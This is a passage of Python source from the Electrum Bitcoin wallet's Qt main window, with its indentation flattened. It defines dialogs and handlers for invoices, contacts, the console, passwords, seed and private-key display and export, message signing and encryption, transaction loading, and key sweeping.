if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
            outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value) + ' ' + self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
                f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
